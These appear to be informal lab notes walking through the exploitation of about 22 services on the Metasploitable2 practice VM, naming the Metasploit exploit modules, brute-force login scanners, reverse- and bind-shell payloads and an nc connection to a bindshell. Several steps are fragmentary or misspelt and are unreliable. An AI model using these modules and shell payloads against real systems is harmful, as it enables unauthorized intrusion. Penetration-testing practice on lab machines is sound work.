To exploit vulnerability associated in metasploitable2.

Metasploit .vul  :-1

 FTP vsftpd 2.3.4

 Backdoor command vulnerability



        Scan the network using nmap. Nmap –v –A –T4

Now open your metasploit framework and search vsftpd

  Now use exploit/unix/ftp/vsftpd_234_backdoor.and exploit it

       Now search shell_to_meterpreter. Use /multi/manage/shell_to_meterpreter.

Now interact both sessions.

 Now run the basic commands. 

Metasploit .vul :-2


     TCP-22 SSH

     Open SSH 4.7p1 Debian 8unbuntu1 (protocol2.0)


  Scan the network using nmap. Nmap –sV

  Open Metasploit and Search for the auxiliary for SSH Login. Command will be “search ssh_login”

   Use the appropriate auxiliary module by typing command “Use 0” and Set the IP of victim machine as RHOSTS global variable by typing command “set rhosts”

For setting the options, type “options” for finding out required field and Set the path of username and password file to USERPASS_FILE option. Also set STOP_ON_SUCCESS and VERBOSE as true. Set the THREADS to 10.


  After running the exploit, MSF will brute force login and will stop attack after finding valid combination.

   Now start sessions “sessions –I 1” and now shell is opened so use shell commands.


Port Number: TCP-23

Service: Telnet

Vulnerability name: Linuxtelnetd


 Scan the network for finding the vulnerabilities.

Nmap –v –A –T4

Now type telnet

Now open Wireshark and check the packet

   Now right click on selected packet and follow the tcp stream.





Metasploit .vul  :-4


Port Number: TCP-1099

Service: TCP-1099 java-rmi

Vulnerability name: GNU Class path grmiregistry


 Scan the network using nmap. Nmap –sV

 Now use exploit (multi/misc/java_rmi_server) and check options.

Now set RHOST.

 Set URI Path as Root and show options.


 Show targets. And use relevant target here mostly use generic.

 Set default payload.

Now exploit it and use.





Metasploit .vul:- 5


 port 8180 and Tomcat service


scan the nmap result 


Find tomcat service port

Type command- search tomcat and search for the login module 

Now search for the options by the command – show options 

 Now set the rhosts, rport, and set stop_on_success as true


 After we enter run, check the successful 


Now, search for tomcat_mgr that is a tomcat manager


 Now, exploit the tomcat

     As we have exploited and entered into the meterpreter. We can run the commands like sysinfo to know the information of the system.

 Now, we have entered into the shell by the command shell, so we can view the directories by ls





Metasploit .vul :-6

port 53/tcp open domain ISC BIND 9.4.2


scan nmap result.


Search  bailiwicked_domain and use spoof/dns/bailiwicked_domain.


Go to wireshark and eth0 .


Open dns packet 



Metasploit .vul :-7


Port :- 6667 IRC server



Go to Metasploit and search unreal_ircd .


Use unix/irc/unreal_ircd_3281_backdoor


Use payload :- 0,2










Metasploit .vul :- 8

Port :- 139  netbios-ssn

Samba usermap script vulnerability                                                                                


Go to Metasploit  and search usermap_script 


Use multi/samba/usermap_script



Use payload :- no use ,18 ,







Metasploit .vul :- 9


Port :- 3632 distccd


Search distcc_exec and use unix/misc/distcc_exec

 Use payload :- 5




Metasploit .vul :-10 

PHP up to versions 5.3.12 and 5.4.2 is vulnerable to an argument injection vulnerability 

port :- 80


Go to browser and check php configuration file path .


Go to msf .


Search php_cgi_arg and use multi/http/php_cgi_arg_injection.






Metasploit .vul :-11


Port :-80 

TWiki history TWikiUsers rev Parameter command execution 


Search twiki_history and use unix/webapp/twiki_history


Use payload “cmd/unix/bind_perl”

Metasploit .vul :- 12


Port :- 445

samba is running on both port 139 and 445 , we will be exploiting it using Metasploit . The default port for this exploit is set to port 139 but it can be changed to port 445 as well .




Metasploit .vul :- 13


Port :- 5432

Got to msf  ,search postgres_payload and use linux/postgres/postgres_payload .


LHOST= linux <IP>

Metasploit .vul :- 14

port 6667 has the Unreal IRCD service running , we will exploit is using a backdoor that's available in Metasploit .



Port :- 6667


Search unreal_ircd and use unix/irc/unreal_ircd_3281_backdoor .

Set payload :- 2,5







Metasploit .vul :- 15


Port :-6697


 Search unreal_ircd and use  unix/irc/unreal_ircd_3281_backdoor .


Set payload “cmd/unix/reverse”






Metasploit .vul :- 16



Port :- 5900

This module will test a VMC server on a range of machines and report successful logins. Currently, it supports RCB protocol version 3.3, 3.7 and  3.8 using the VNC challenge-response authentication mothod .


search vnc_login use scanner/vnc/vnc_login.

Let's put what we've found to the test by connecting using the vncviewer
Command  "vncvirwer Metasploit<IP>"




Metasploit .vul :-17


Port :- 1524

Metasploitable 2 comes with an open bindshell service running on port 1524. We will be using Netcat toconnect to it


go to msf and enter command "nc<Metasploit IP> 1524"






Metasploit .vul :- 18

Port :- 2121  ,  proFTPD

telnet <Taget IP Address> <Port Number>

USER <username>
PASS <password>





Metasploit .vul :- 19


 Port :-3306 , MySQL …

Set command and enter .

No passwd so direct press enter ….

Metasploit .vul :- 20


Prot :- 25 ,SMTP


Search smtp_enum and use scanner/smtp/smtp_enum .

Open second terminal.

Smtp commands .



Metasploit .vul :- 21


Remote shell exploitation


Port:- 514 


Install rsh-client


Enter command “rsh <ip>”



Metasploit .vul :- 22

Port :- 513 , rlogin



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